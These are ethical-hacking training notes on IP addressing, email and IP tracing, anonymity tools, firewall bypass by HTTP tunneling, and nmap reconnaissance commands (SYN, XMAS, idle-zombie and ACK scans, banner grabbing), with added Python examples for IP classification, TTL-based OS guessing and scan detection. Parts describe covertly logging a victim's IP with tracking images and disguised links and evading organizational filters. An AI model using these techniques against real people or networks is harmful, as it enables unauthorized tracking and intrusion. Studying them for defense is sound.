Who is a hacker?
A hacker is NOT a criminal.
A hacker is:
    - Somebody who thinks outside the box
    - Wants to test his limits
    - Wants to try things that are not in the manual
    - Has unlimited curiosity
    - Discovers unknown features about technology
    - Dedicated to knowledge
    - Believes in stretching the limits
    - Highly creative
Hackers vs. Crackers
Hackers                                 Crackers
Good guy                                Bad guy
Help improve security                   Want to cause cyber destruction
Strong ethics                           No ethics
Have prior permission                   No prior permission
(Both are very knowledgeable.)

Job opportunities: banking, telecom, IT/ITeS/BPO/KPOs, e-commerce, military, police, retail
industry, etc.
Hacking into a computer is just like breaking into a house.
Steps of a hacker:
1. Identify the victim (information gathering)
2. Find a loophole (network reconnaissance)
3. Actual attack/hack/break-in
4. Escape without a trace

Identify the victim:-
Anatomy of an IP address:- An IP address is something analogous to your mobile phone
number. It is something which uniquely identifies your presence on the internet. It is a
32-bit address which is divided into four 8-bit fields, each containing a number between 1
and 255. By simply studying an IP address, we can easily reveal a lot of information
about the network the victim belongs to.
Different classes of IP address:
Class   Range                                  Network/Host IDs
A       0.0.0.0 to 126.255.255.255             NETWORK.HOST.HOST.HOST
B       128.0.0.0 to 191.255.255.255           NETWORK.NETWORK.HOST.HOST
C       192.0.0.0 to 223.255.255.255           NETWORK.NETWORK.NETWORK.HOST
D       224.0.0.0 to 239.255.255.255           Multicast IP addresses, set aside for special purposes
E       240.0.0.0 to 255.255.255.255           Not in use

Example address XX.YY.AA.BB:
            Network ID          Host ID
Class A:    XX                  YY.AA.BB
Class B:    XX.YY               AA.BB
Class C:    XX.YY.AA            BB
Special IP addresses:
Use                                                  IP address
Local loopback address                               127.0.0.1
Private IP addresses (for computers inside a         Class A network: 10.0.0.0 – 10.255.255.255
private network or LAN)                              Class B network: 172.16.0.0 – 172.31.255.255
                                                     Class C network: 192.168.0.0 – 192.168.255.255

Converting IP addresses into different formats:
Format                                            IP Address
Decimal                                           171.67.215.200
Binary                                            10101011.01000011.11010111.11001000
Octal                                             253.103.327.310
Hexadecimal                                       00AB.0043.00D7.00C8

http://www.csgnetwork.com/ipaddconv.html
Windows Scientific calculator
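As an added example (not part of the original notes), the classification and conversion described above in Python: it assigns the class from the first octet using the ranges in the table, splits network and host IDs, checks the private and loopback blocks, and renders the four formats, with the hexadecimal form padded to four digits per octet as in the table.

```python
import ipaddress

# Class ranges by first octet, as in the table above; 127.x.x.x is the loopback block.
CLASS_RANGES = [
    ("A", 0, 126, 1),      # (class, low, high, number of network octets)
    ("B", 128, 191, 2),
    ("C", 192, 223, 3),
    ("D", 224, 239, 0),    # multicast: no network/host split
    ("E", 240, 255, 0),    # reserved / not in use
]

# Private blocks listed in the special-address table.
PRIVATE_BLOCKS = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
]


def octets(addr):
    """Split a dotted-quad string into four ints, rejecting anything malformed."""
    parts = addr.strip().split(".")
    if len(parts) != 4 or not all(p.isdigit() for p in parts):
        raise ValueError("not a dotted-quad IPv4 address: %r" % addr)
    values = [int(p) for p in parts]
    if any(v > 255 for v in values):
        raise ValueError("octet out of range in %r" % addr)
    return values


def ip_class(addr):
    """Return 'A'..'E', or 'loopback' for 127.x.x.x."""
    first = octets(addr)[0]
    if first == 127:
        return "loopback"
    for name, low, high, _ in CLASS_RANGES:
        if low <= first <= high:
            return name
    raise AssertionError("unreachable: first octet is always 0..255")


def split_network_host(addr):
    """Return (network ID, host ID) for classes A-C; None for D, E and loopback."""
    cls = ip_class(addr)
    n = {name: count for name, _, _, count in CLASS_RANGES}.get(cls, 0)
    if n == 0:
        return None
    o = octets(addr)
    return ".".join(map(str, o[:n])), ".".join(map(str, o[n:]))


def is_private(addr):
    """True when the address falls in one of the private blocks from the table."""
    ip = ipaddress.ip_address(addr)
    return any(ip in block for block in PRIVATE_BLOCKS)


def formats(addr):
    """Decimal, binary, octal and hexadecimal forms (hex padded to 4 digits per octet)."""
    o = octets(addr)
    return {
        "decimal": ".".join(map(str, o)),
        "binary": ".".join("{:08b}".format(v) for v in o),
        "octal": ".".join("{:o}".format(v) for v in o),
        "hexadecimal": ".".join("{:04X}".format(v) for v in o),
    }


def describe(addr):
    """Everything the notes say you can read off an address, in one dict."""
    return {
        "class": ip_class(addr),
        "network_host": split_network_host(addr),
        "private": is_private(addr),
        "formats": formats(addr),
    }


if __name__ == "__main__":
    for sample in ("171.67.215.200", "10.0.0.5", "127.0.0.1", "224.0.0.1"):
        print(sample, describe(sample))
```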
Tracking the victim's IP address
www.spypig.com – used to find out the IP address of the victim by sending a tracking
image to the victim's email id.
http://www.getnotify.com/
http://didtheyreadit.com/
http://www.politemail.com/ - commonly used in the corporate world
http://readnotify.com/ - creates a tracking file like a Word or PDF file.
How to trace an email back to its sender?
1st technique:-
Step 1: Open the email headers (Gmail: "Show original" option; Yahoo: Email settings -> Full
headers)
Step 2: Analyze the email headers manually (the headers contain the sender's IP address)
2nd technique:- Analyze the headers automatically using emailTrackerPro (http://www.emailtrackerpro.com/)
3rd technique:- http://blasze.com/iplog/
Simply send a crafted link to your friend.
Now we have an ORIGINAL URL and a VICTIM URL.
DISGUISED URL: use a URL shortening website such as www.bit.ly or www.goo.gl
4th technique: www.whatismyipaddress.com
How to find out the victim's IP address using a website?
Step 1: Create your own website/webpage/blog
Step 2: In the homepage, write Java code to extract the IP address and MAC address of the victim
Step 3: Invite the victim(s)
5th technique: Using chatting software (not a reliable technique though)
Set up a chat with the victim and type the below command in the DOS prompt:
netstat -n
6th technique:- TCPView software http://technet.microsoft.com/en-us/sysinternals/bb897437.aspx
Currports http://www.nirsoft.net/utils/cports.html
How to trace an IP address to its exact geographical location?
http://visualroute.visualware.com/
NeoTrace Pro http://neotrace-pro.en.softonic.com/
3D Traceroute http://www.d3tr.de/
LoriotPro http://www.loriotpro.com/
GeoSpider http://oreware.com/viewprogram.php?prog=22
http://vtrace.pl/
All are online versions of the simple traceroute command.
Ex: tracert www.indiatimes.com
Trace a mobile phone number to its geographical location
http://trace.bharatiyamobile.com/
Tracking a stolen smartphone
https://www.lookout.com/
Create a Lookout account and register your device.
Summary
    - What to do to be a hacker
    - What is an IP address
    - How to get somebody's IP address
    - How to trace the IP address's exact geographic location
    - How to track a mobile phone
    - How to trace a lost smartphone

Internal and External IP addresses
Introduction to NAT (Network Address Translation)
When the internet was initially created, there was no shortage of IP addresses.
However, as internet usage spread, an acute shortage of IP addresses was created
worldwide. This led to the emergence of Network Address Translation.
Advantages of NAT are: it reduces the need for IP addresses, improves security and makes
implementation of networks easier.
In a NAT system, nobody from the outside world will know the IP address of an internal system.
    - Identity is protected
    - No direct connection
In a NAT-enabled system, a person from outside first has to hack into the router
before trying to get into the internal system.
NAT works like a telephone exchange with extension numbers: depending upon the extension
number entered, the lookup table is used to route the call to the appropriate internal system.
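As an added illustration (not part of the original notes), a minimal port-overloading NAT table in Python: outbound flows from internal hosts create entries keyed by a public port, and inbound packets are forwarded only when they match an existing entry, which is the "no direct connection" property described above. All addresses are constructed documentation-range values.

```python
import itertools


class Napt:
    """Toy NAPT (port-overloading NAT) table.

    Outbound packets get the router's public address and a fresh public port, and
    the translation is remembered. Inbound packets are looked up by public port and
    forwarded only if they come from the remote host that flow was opened to;
    anything else is dropped, so an outsider can neither reach an internal host
    directly nor learn its private address from the packets it sees.
    """

    def __init__(self, public_ip, first_port=40000):
        self.public_ip = public_ip
        self._ports = itertools.count(first_port)
        # public port -> (internal ip, internal port, remote ip, remote port)
        self._by_public_port = {}
        # (internal ip, internal port, remote ip, remote port) -> public port
        self._by_flow = {}

    def outbound(self, src_ip, src_port, dst_ip, dst_port):
        """Translate a packet leaving the LAN; returns the rewritten 4-tuple."""
        flow = (src_ip, src_port, dst_ip, dst_port)
        public_port = self._by_flow.get(flow)
        if public_port is None:
            public_port = next(self._ports)
            self._by_flow[flow] = public_port
            self._by_public_port[public_port] = flow
        return (self.public_ip, public_port, dst_ip, dst_port)

    def inbound(self, src_ip, src_port, dst_port):
        """Translate a packet arriving at the public address, or None to drop it."""
        flow = self._by_public_port.get(dst_port)
        if flow is None or flow[2] != src_ip or flow[3] != src_port:
            return None  # no internal host opened this flow: unsolicited, dropped
        internal_ip, internal_port, _, _ = flow
        return (src_ip, src_port, internal_ip, internal_port)

    def mappings(self):
        """Current lookup table (public port -> flow), for inspection."""
        return dict(self._by_public_port)


if __name__ == "__main__":
    nat = Napt("203.0.113.1")                      # constructed router address
    print(nat.outbound("10.0.0.5", 49152, "198.51.100.20", 80))
    print(nat.inbound("198.51.100.20", 80, 40000))   # reply: forwarded inside
    print(nat.inbound("198.51.100.7", 12345, 40000)) # unsolicited probe: None
```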
How to find out the internal IP address & external IP address?
The internal IP address can be found using:
netstat -n
ipconfig /all
The external IP address can be found on http://whatismyipaddress.com/
How to hide your IP address? By using a proxy server.
http://www.anonymizer.ru – online tool/web proxy
Most of the Russian proxy websites are free.
None of them maintain any record or log files.
http://samair.ru/proxy/
http://www.hidemyass.com/ - uses URL encoding so that "facebook" does not appear in the
URL
Torrents:-
How are torrents blocked?
    - Disabling torrent clients
      Solution- http://www.bitlet.org/
    - Block download of .torrent extension files
      Solution- http://www.torrent2exe.com/
                http://txtor.dwerg.net/
The perfect cyber crimes are committed by effectively hiding your presence on the internet.
Your presence on the internet can be spoofed or tricked by hiding your IP address as well as
by hiding your system's MAC address, plus with a lethal technique called war driving.
Difference between IP address and MAC address
IP address                                         MAC address
Given by ISP/network                               Given by the manufacturer and it is static
2 types: static IP address and dynamic IP          Your hardware Network Interface Card (NIC),
address                                            like an ethernet card, wifi card, bluetooth, etc.,
                                                   has its own unique MAC address
DOS command to get your internal IP                DOS command to get their respective MAC
address:                                           addresses:
ipconfig /all                                      getmac
To get your external IP address, open your
web browser and go to
http://whatismyipaddress.com/


The perfect cyber crimes are committed by:
Proxy bouncing – IP hiding or IP spoofing (Ultrasoft)
MAC spoofing – (MACAddressChanger, MacMakeUp (doesn't work on Windows XP),
MadMacs, EtherChange, BWmachak)
War driving – driving on the streets with a laptop and scanning for unprotected Wifi networks
(inSSIDer, NetStumbler, Kismet, AirSnort and war chalking)
Onion routing protocol – provides anonymous, secure, encrypted access to the internet.
Ex- TOR
How is TOR better than proxy servers?
TOR is available as a free download from http://www.torproject.org.in/
How to unblock TOR?
- Change the name of the downloaded TOR exe file
- In TOR's proxy settings, change the default port number
- Add bridge relay server URLs to TOR from https://bridges.torproject.org/
Bridge relays (or "bridges" for short) are Tor relays that aren't listed in the main directory.
Since there is no complete public list of them, even if your ISP is filtering connections to all
the known Tor relays, they probably won't be able to block all the bridges.

In case https://bridges.torproject.org/ is blocked, another way to find public bridge addresses
is to send mail to bridges@torproject.org with the line "get bridges" by itself in the body of
the mail. However, so we can make it harder for an attacker to learn lots of bridge
addresses, you must send this request from an email address at one of the following
domains:

       gmail.com
       yahoo.com

Types of proxy servers – SOCKS and HTTP

HTTP proxy servers – allow you to bypass filtering mechanisms and access blocked
content. The user sends an HTTP request to the proxy server, which then reads the Host header in
the HTTP request, connects to the target server and transmits back whatever data the
server sends back. Usually, it works only with HTTP apps. Ex:- anonymizer.com

SOCKS proxy servers – allow you to bypass filtering mechanisms and access blocked
content. SOCKS is a protocol that transmits data between source and destination via a
proxy server without reading any of the contents. Hence it works with all protocols like
TCP, UDP, etc., and will allow you to use all applications (like mail, browsing,
downloading files, etc.). Ex- TOR

TOR works on port number 9051.

Using TOR, you can hide yourself in Skype or any other instant messenger. There are 2
ways to do this:

    - Connect the application to TOR
    - Connect the application to a proxy
Both cases require an IP address and port number.
    Go to Skype -> Tools -> Options -> Connection settings -> Proxy
    Give the proxy IP as 127.0.0.1 and port number 9051.

Tools:-

Multiproxy (http://multiproxy.org/multiproxy.htm) – allows you to keep all proxies in the same
session. It supports both HTTP and SOCKS. You just need to feed this software with the
proxy servers.

SocksChain http://ufasoft.com/socks/ – connects you to a chain of SOCKS or HTTP
proxies (proxy bond)

ProxyFire http://www.proxyfire.net/

Ultrasurf https://ultrasurf.us/ - anonymous browsing from your pendrive. It encrypts the
connection, hides your IP and unblocks stuff. You can even configure a proxy inside Ultrasurf
if your college/organization requires a proxy server to connect to.

Virtual Private Network (VPN)

A VPN is a group of computers connected privately through a public network like the Internet.
Usually VPN services give you an encrypted, secure and anonymous communication
channel. Popular VPN services are:- HideMyAss, IPVanish, StrongVPN, BoxVPN, 12VPN
and GoTrusted.

A VPN is like a proxy but in a private network. If Ultrasurf/SOCKS or proxy services don't
work as expected, a VPN service is used. VPN servers, like proxy servers, can be in different
parts of the world. These servers provide better speed than proxy servers.

VPNs are used to access blocked videos on the Internet. Ex:- http://www.hidemyass.com/vpn/

HTTP Tunneling

Assume that inside your network, FTP and some websites/torrents are blocked by your firewall.
But no firewall blocks all traffic. HTTP tunneling disguises blocked traffic as regular/allowed
HTTP traffic. Let us assume that in your college/company, the FTP protocol (port 21) is blocked or
torrents are blocked. The firewall only allows HTTP traffic on port 80; all other ports are
blocked. It is possible to encapsulate FTP or torrent traffic inside the HTTP protocol and bypass
the firewall.

Step 1:- Install the HTTP tunneling server software on your home or outside computer that has
unrestricted access.

Step 2:- Install the HTTP tunneling client software on your college/office computer that has
restricted access.

Step 3:- Now your connection diagram is as follows:

YOU -> FTP or torrent software -> HTTP tunneling client (sends FTP or torrent traffic
encapsulated in the HTTP protocol via port 80 to bypass the firewall) -> HTTP tunneling server on
home computer -> FTP or torrent destination
Now you can use the college computer to access everything on your home network including
unrestricted internet. Ex:- Tunnelizer, HTTPort and HTTPTunnel are good HTTP tunneling
tools.

Super Network Tunnel (http://www.networktunnel.net/) is a commercial tool to perform 2-way
HTTP tunneling:

Home network <-> college network

Some cool stuff:-

PSIPHON (http://psiphon.ca/)

Proxy workbench (http://proxyworkbench.com/)

Reverse text:- http://www.textmechanic.com/

Upside down text (http://www.upsidedowntext.com/)


People hacking:-

Whatever we do online is tracked by some website.
http://www.pipl.com/
http://www.spokeo.com/
http://www.anywho.com/
http://www.intelius.com/
Google Maps street view
Google Earth satellite view
Network reconnaissance and information gathering
2nd step of hacking
Network reconnaissance is the process of finding out as much information about the victim as
possible. Typically an attacker is trying to find out the following about the victim:
    - Victim is online/offline
    - Network topography
    - DNS information
    - List of open ports
    - Names and versions of software running on open ports
    - OS details
    - Possible security loopholes
Techniques:-
    PING sweeping, traceroute
    DNS related tools
    LAN surveyors
    Port scanning
    Daemon banner grabbing
    OS fingerprinting
    Security auditing
How to execute the attack
Ping sweeping
Ping is used to check the connectivity between your computer and the remote computer
(whether you are online, whether the victim is online and whether there is connectivity
between both of you).
Ping is also used for Denial of Service (DoS) attacks and for OS and firewall detection purposes.
Popular sweeping tools are nmap (http://nmap.org/) and
http://ping.eu/
Ping using Nmap:-
nmap -sn -v www.google.com
(-sn means no port scan)
Ping bypassing the firewall:
nmap -sn -v -Pn www.google.com
Instead of using ICMP echo requests, it connects to port 80.
-sn == perform ping only. -v == verbose mode (gives you detailed information about what it
is doing)
ICMP echo requests/replies can easily be blocked by a firewall. Hence, the -Pn option
attempts to connect to the website on port 80 of www.google.com.
Ping sweeping allows you to ping an entire range of computers:
nmap -sn -v 203.94.1.0-255
Angry IP Scanner – ping sweeping tool
Traceroute
When data packets travel from the source to the destination system, they do not always
take the same path. Traceroute is a tool that allows you to trace the path between two
systems. Originally it was designed for network troubleshooting, but it is commonly used for:
- OS detection
- Firewall detection
- Network topology information
- Geographical location of the target system
How to guess the operating system running on a remote computer by simply using PING
and TRACEROUTE?
Time to live (TTL) is a mechanism that limits the lifespan or lifetime of data in a
computer or network. The TTL value gets reduced by one every time a data packet passes through a
router. The initial TTL value is determined by the operating system. If I am able to find
out the initial TTL value of a data packet sent by the victim, I can guess the operating
system running on the victim, because different operating systems use different initial TTL values.
Final TTL value = Initial TTL value - No. of routers
Steps to know what OS www.altoromutual.com is running (it is legal to hack this URL)
Step 1:-
E:\Documents and Settings\SYS>ping www.altoromutual.com

Pinging altoromutual.com [65.61.137.117] with 32 bytes of data:

Reply from 65.61.137.117: bytes=32 time=290ms TTL=117
Reply from 65.61.137.117: bytes=32 time=290ms TTL=117
Reply from 65.61.137.117: bytes=32 time=289ms TTL=117
Reply from 65.61.137.117: bytes=32 time=290ms TTL=117
Ping statistics for 65.61.137.117:
   Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
   Minimum = 289ms, Maximum = 290ms, Average = 289ms
Inference:- Final TTL value = 117
117 = Initial TTL value – No. of router hops
Step 2:-
E:\Documents and Settings\SYS>tracert www.altoromutual.com

Tracing route to altoromutual.com [65.61.137.117]
over a maximum of 30 hops:

  1    <1 ms    <1 ms    <1 ms  192.168.1.1
  2    22 ms    23 ms    25 ms  ABTS-KK-Static-001.228.178.122.airtelbroadband.in [122.178.228.1]
  3    20 ms    21 ms    21 ms  ABTS-KK-Static-217.32.166.122.airtelbroadband.in [122.166.32.217]
  4    20 ms    21 ms    21 ms  AES-Static-025.102.22.125.airtel.in [125.22.102.25]
  5   185 ms   178 ms   176 ms  125.62.187.189
  6   177 ms   178 ms   178 ms  ldn-b2-link.telia.net [213.248.71.17]
  7   177 ms   178 ms   178 ms  ldn-bb2-link.telia.net [80.91.247.26]
  8   290 ms   291 ms   291 ms  nyk-bb2-link.telia.net [80.91.248.254]
  9     *        *        *     Request timed out.
 10     *      290 ms   288 ms  rackspace-ic-127247-dls-bb1.c.telia.net [213.248.88.174]
 11   290 ms   289 ms   291 ms  coreb.dfw1.rackspace.net [74.205.108.52]
 12   291 ms   291 ms   291 ms  core5.dfw1.rackspace.net [74.205.108.27]
 13   290 ms   294 ms   289 ms  67.192.56.19
 14   291 ms   289 ms   289 ms  65.61.137.117

Trace complete.

E:\Documents and Settings\SYS>
Inference:- Count the number of hops. Eliminate the 1st entry (the source side) and the last
entry (the destination) and do not count request timeouts. This gives 11 router hops.
Final TTL value = 117
No. of router hops = 11
117 = Initial TTL value – 11
Initial TTL value = 128
Step 3:-
Now google search for the default TTL values of different operating systems.
From the URL http://www.binbert.com/blog/2009/12/default-time-to-live-ttl-values/,
a TTL value of 128 corresponds to some Windows-based operating system running on the victim
(www.altoromutual.com).
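As an added example (not from the notes), this Python reproduces Steps 1-3 on the captured output above: it reads the TTL from the ping replies, counts hops from the tracert listing using the rule in the notes, and, as the more robust check a practitioner uses, rounds the observed TTL up to the nearest common default (64, 128, 255); the OS-name table is the well-known default set and is an assumption of this example. The same arithmetic tells a defender what their own hosts reveal, which the TTL countermeasure later in these notes addresses.

```python
import re
from collections import Counter

# Well-known default initial TTLs (assumed here; the notes link to a fuller table).
DEFAULT_TTLS = {
    64: "Linux / Unix-like (macOS, Android, FreeBSD)",
    128: "Windows",
    255: "Network devices, Solaris, AIX",
}

PING_TTL = re.compile(r"\bTTL=(\d+)\b")
HOP_LINE = re.compile(r"^\s*(\d+)\s+(.*)$")

# Constructed sample: the ping/tracert output shown above, with wrapped lines joined.
PING_OUTPUT = """\
Pinging altoromutual.com [65.61.137.117] with 32 bytes of data:

Reply from 65.61.137.117: bytes=32 time=290ms TTL=117
Reply from 65.61.137.117: bytes=32 time=290ms TTL=117
Reply from 65.61.137.117: bytes=32 time=289ms TTL=117
Reply from 65.61.137.117: bytes=32 time=290ms TTL=117
"""

TRACERT_OUTPUT = """\
Tracing route to altoromutual.com [65.61.137.117]
over a maximum of 30 hops:

  1    <1 ms    <1 ms    <1 ms  192.168.1.1
  2    22 ms    23 ms    25 ms  ABTS-KK-Static-001.228.178.122.airtelbroadband.in [122.178.228.1]
  3    20 ms    21 ms    21 ms  ABTS-KK-Static-217.32.166.122.airtelbroadband.in [122.166.32.217]
  4    20 ms    21 ms    21 ms  AES-Static-025.102.22.125.airtel.in [125.22.102.25]
  5   185 ms   178 ms   176 ms  125.62.187.189
  6   177 ms   178 ms   178 ms  ldn-b2-link.telia.net [213.248.71.17]
  7   177 ms   178 ms   178 ms  ldn-bb2-link.telia.net [80.91.247.26]
  8   290 ms   291 ms   291 ms  nyk-bb2-link.telia.net [80.91.248.254]
  9     *        *        *     Request timed out.
 10     *      290 ms   288 ms  rackspace-ic-127247-dls-bb1.c.telia.net [213.248.88.174]
 11   290 ms   289 ms   291 ms  coreb.dfw1.rackspace.net [74.205.108.52]
 12   291 ms   291 ms   291 ms  core5.dfw1.rackspace.net [74.205.108.27]
 13   290 ms   294 ms   289 ms  67.192.56.19
 14   291 ms   289 ms   289 ms  65.61.137.117

Trace complete.
"""


def final_ttl_from_ping(ping_output):
    """TTL seen in the echo replies (most frequent value, in case one reply took another path)."""
    values = [int(v) for v in PING_TTL.findall(ping_output)]
    if not values:
        raise ValueError("no TTL= field in ping output")
    return Counter(values).most_common(1)[0][0]


def count_router_hops(tracert_output):
    """Hop count the way the notes compute it: drop the first and last entries, skip timeouts."""
    counted = []
    for line in tracert_output.splitlines():
        m = HOP_LINE.match(line)
        if m:
            counted.append("Request timed out" not in m.group(2))
    if len(counted) < 3:
        raise ValueError("need at least three traceroute entries")
    return sum(counted[1:-1])


def initial_ttl_from_final(final_ttl):
    """Round the observed TTL up to the nearest common default. This stays correct even
    when the reverse path is longer or shorter than the one traceroute showed."""
    for default in sorted(DEFAULT_TTLS):
        if final_ttl <= default:
            return default
    raise ValueError("TTL above 255 cannot occur")


def guess_os(ping_output, tracert_output):
    """Combine both measurements and report whether the notes' arithmetic agrees."""
    final_ttl = final_ttl_from_ping(ping_output)
    hops = count_router_hops(tracert_output)
    initial = initial_ttl_from_final(final_ttl)
    return {
        "final_ttl": final_ttl,
        "hops": hops,
        "initial_ttl": initial,
        "hop_arithmetic_agrees": final_ttl + hops == initial,
        "os": DEFAULT_TTLS[initial],
    }


if __name__ == "__main__":
    print(guess_os(PING_OUTPUT, TRACERT_OUTPUT))
```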
Domain Name Server
A DNS lookup is a query sent by a user (browser or IM or email client) to a DNS server
to convert a particular domain name to its respective IP address.
www.whois.net
www.iptools.com
www.betterwhois.com
www.dnsstuff.com
www.dnstools.com
www.zoneedit.com/lookup.html
Port Scanning:-
Port scanning is the art of scanning a remote target system to obtain a list of open virtual
ports on it that are listening for connections. This is usually one of the first few steps
every criminal takes.
Popular port scanning tools: nmap, strobe, superscan, etc.
It allows a criminal to identify any potential entry points into a target computer. The
following covers how to see open ports on some remote computer.
Popular Ports:-
21 FTP
23 Telnet
25 SMTP
53 DNS
80 HTTP
110 POP3
443 SSL/https
513 rlogin
TCP packet format:-
Flag types –
SYN == Start a new connection
FIN == End an existing connection
RST == Error notification
ACK == Data received successfully
How are connections established on the Internet?
3-step / 3-way TCP/IP handshake ("=====>" means sends)
Step 1: Client (me) =====> SYN packet =====> Host (Google)
Step 2: Host =====> SYN/ACK packet =====> Client
Step 3: Client =====> ACK packet =====> Host
How are connections terminated?
2 steps:-
Step 1: Client =====> FIN packet =====> Host
Step 2: Host =====> ACK packet =====> Client
(The reverse also needs to happen.)
It is possible to create your own packets using Colasoft Packet Builder (packet
generator) and Komodia Packet Crafter, which are available as free downloads on the
internet.
TCP CONNECT port scan / TCP handshake port scan:-
The port scan establishes a full 3-way TCP/IP handshake with all ports on the remote
system.
Procedure:-
ATTACKER sends a SYN packet to TARGET
OPEN:- TARGET sends back a SYN/ACK packet
CLOSED:- TARGET sends back a RST/ACK packet
ATTACKER sends an ACK (then RST) packet back to TARGET
Advantages:- Very accurate, no countermeasures
Disadvantages:- Attacker is easily detected/caught
Nmap command:-
nmap -sT -p1-100 -Pn www.altoromutual.com
-sT  TCP connect port scan
-p   port range
Second type of scan, where detection is difficult:
1) TCP SYN port scan / half-open scan / stealth scan.
Also known as a half-open scan because only half of the complete 3-way TCP/IP
handshake is executed.
ATTACKER sends a SYN packet to TARGET
OPEN: TARGET sends back a SYN/ACK packet
No third step (unlike the previous scan). Considered stealth. Can be detected using
PortSentry on Unix platforms (http://sourceforge.net/projects/sentrytools/)
nmap -sS -p1-100 -Pn www.altoromutual.com
(-sS == SYN scan)

NULL/XMAS port scan – stealth but unreliable, with varied responses
nmap -sX -p1-100 www.altoromutual.com (XMAS scan: all flags set to 1)
nmap -sN -p1-100 www.altoromutual.com (NULL scan: all flags set to 0)

2) IDLE port scan (blind port scanning):
Very useful for the attacker.
It port scans the victim without sending even a single packet to the victim from the attacker's own IP
address. Every system has a fragment ID number, which is a 4-digit number that is
increased by 1 each time a packet is sent by it.
Step 1: Probe a zombie machine for its fragment ID.
ATTACKER =====> sends SYN/ACK packet =====> ZOMBIE
ZOMBIE =====> sends back a RST packet with fragment ID =====> ATTACKER
Assume the recorded fragment ID = 1012.
Step 2: Send a spoofed SYN packet from the zombie to the victim.
OPEN: Victim sends SYN/ACK to zombie. Zombie sends back a RST and increases its
fragment ID by 1, so it becomes 1013.
CLOSED: Victim sends RST to zombie, which discards the RST packet and does not change
its fragment ID.
Step 3: Probe the fragment ID of the zombie again. If the fragment ID increased by 1, then the port
on the victim is open, else it is closed.
nmap -Pn -p 1-100 -sI <ZOMBIE/friend's IP address> www.altoromutual.com
-sI ==> idle port scan
3) ACK port scan / firewall detection scan
nmap -sA -Pn -p 1-100 www.altoromutual.com
This type of scan can be used to determine the presence of a firewall filtering out data
packets.
ATTACKER sends an ACK packet to TARGET
FIREWALL PRESENT: No response
FIREWALL NOT PRESENT: Target sends back a RST packet.
Other command line port scanning tools: scanline, hping3, etc.
Countermeasures:
- Foolproof countermeasures against port scanning do not exist.
- Close as many ports as possible.
- Filter out certain packets using firewalls, ACLs and other filters using tools like
    Scanlogd, BlackICE, Abacus, Portsentry, snort, etc.
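As an added example (not from the notes), a small Python detector of the kind that Scanlogd and PortSentry-style tools implement, run over constructed iptables LOG-style lines (a SYN scan, an XMAS scan and one legitimate client): it maps TCP flag sets to the scan types described above, alerts when one source touches many distinct ports within a time window, and alerts on any NULL/FIN/XMAS probe at once, since a normal TCP stack never opens a connection with those flag combinations. The log format and addresses are assumptions of this example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

TCP_FLAGS = {"SYN", "ACK", "FIN", "RST", "PSH", "URG"}
LOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d{2}:\d{2}:\d{2}) .*?"
    r"SRC=(?P<src>\S+) DST=(?P<dst>\S+) .*?PROTO=TCP .*?DPT=(?P<dpt>\d+)(?P<rest>.*)$"
)


def _line(ts, src, dport, flags, sport=40000):
    # Constructed iptables LOG-style line (not real traffic).
    return ("Jan 10 %s fw kernel: IN=eth0 SRC=%s DST=192.0.2.10 LEN=60 PROTO=TCP "
            "SPT=%d DPT=%d %s" % (ts, src, sport, dport, flags))


SCAN_PORTS = [21, 22, 23, 25, 53, 80, 110, 143, 443, 513, 3306, 8080]
SAMPLE_LOG = (
    # SYN scan: 12 distinct ports from one source within 12 seconds
    [_line("12:00:%02d" % i, "198.51.100.7", p, "SYN") for i, p in enumerate(SCAN_PORTS)]
    # XMAS scan: FIN+PSH+URG, a combination no normal connection produces
    + [_line("12:00:03", "198.51.100.9", p, "FIN PSH URG") for p in (22, 80, 443)]
    # Legitimate client: a handshake to 443 and, later, a visit to 80
    + [_line("12:00:05", "203.0.113.5", 443, "SYN"),
       _line("12:00:05", "203.0.113.5", 443, "ACK"),
       _line("12:00:40", "203.0.113.5", 80, "SYN")]
)


def parse_line(line):
    """Parse one log line into a dict, or None for lines that are not TCP packet logs."""
    m = LOG_RE.match(line)
    if not m:
        return None
    flags = frozenset(tok for tok in m.group("rest").split() if tok in TCP_FLAGS)
    return {
        "time": datetime.strptime(m.group("ts"), "%b %d %H:%M:%S"),
        "src": m.group("src"),
        "dport": int(m.group("dpt")),
        "flags": flags,
    }


def classify_flags(flags):
    """Map a TCP flag set to the scan type it resembles (nmap option in the comment)."""
    flags = frozenset(flags)
    if not flags:
        return "null"                        # -sN: no flags at all
    if flags == {"FIN", "PSH", "URG"}:
        return "xmas"                        # -sX
    if flags == {"FIN"}:
        return "fin"                         # -sF
    if flags == {"SYN"}:
        return "syn"                         # -sS, or the first packet of -sT
    if flags == {"ACK"}:
        return "ack"                         # -sA firewall detection
    return "normal"


ANOMALOUS = ("null", "xmas", "fin")          # never sent by a stack opening a connection


def detect_scans(lines, port_threshold=10, window_seconds=60):
    """Return {source: {"kind", "ports"}} for sources that look like port scanners."""
    by_src = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev:
            by_src[ev["src"]].append(ev)
    alerts = {}
    for src, events in by_src.items():
        events.sort(key=lambda e: e["time"])
        kinds = [classify_flags(e["flags"]) for e in events]
        odd = [k for k in kinds if k in ANOMALOUS]
        if odd:
            alerts[src] = {"kind": odd[0], "ports": len({e["dport"] for e in events})}
            continue
        # SYN and ACK probes also occur in normal traffic: alert only when one source
        # touches many distinct ports inside a sliding window.
        for kind in ("syn", "ack"):
            probes = [e for e, k in zip(events, kinds) if k == kind]
            best = 0
            for i, start in enumerate(probes):
                limit = start["time"] + timedelta(seconds=window_seconds)
                ports = {e["dport"] for e in probes[i:] if e["time"] <= limit}
                best = max(best, len(ports))
            if best >= port_threshold:
                alerts[src] = {"kind": kind, "ports": best}
                break
    return alerts


if __name__ == "__main__":
    for src, info in detect_scans(SAMPLE_LOG).items():
        print("%s: %s scan across %d ports" % (src, info["kind"], info["ports"]))
```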

Daemon Banner Grabbing

It helps you confirm your guess about the victim's operating system. Once the attacker gets to
know the list of installed software on the victim system, the attacker google searches for
vulnerabilities in the installed software.

Daemon banner grabbing: It is the process of getting useful information about the
target system by recording the welcome banners of the daemons running on various
ports. It can be used to get the following information about the target system:
    o Daemon name and version number
    o OS information
    o Most important, to identify possible points of entry
nmap -sV -p 1-100 www.altoromutual.com
Scanline:-
sl -v -bt 1-100 www.altoromutual.com
Manual technique using PuTTY (Telnet client):
Telnet to port 80 of the victim.
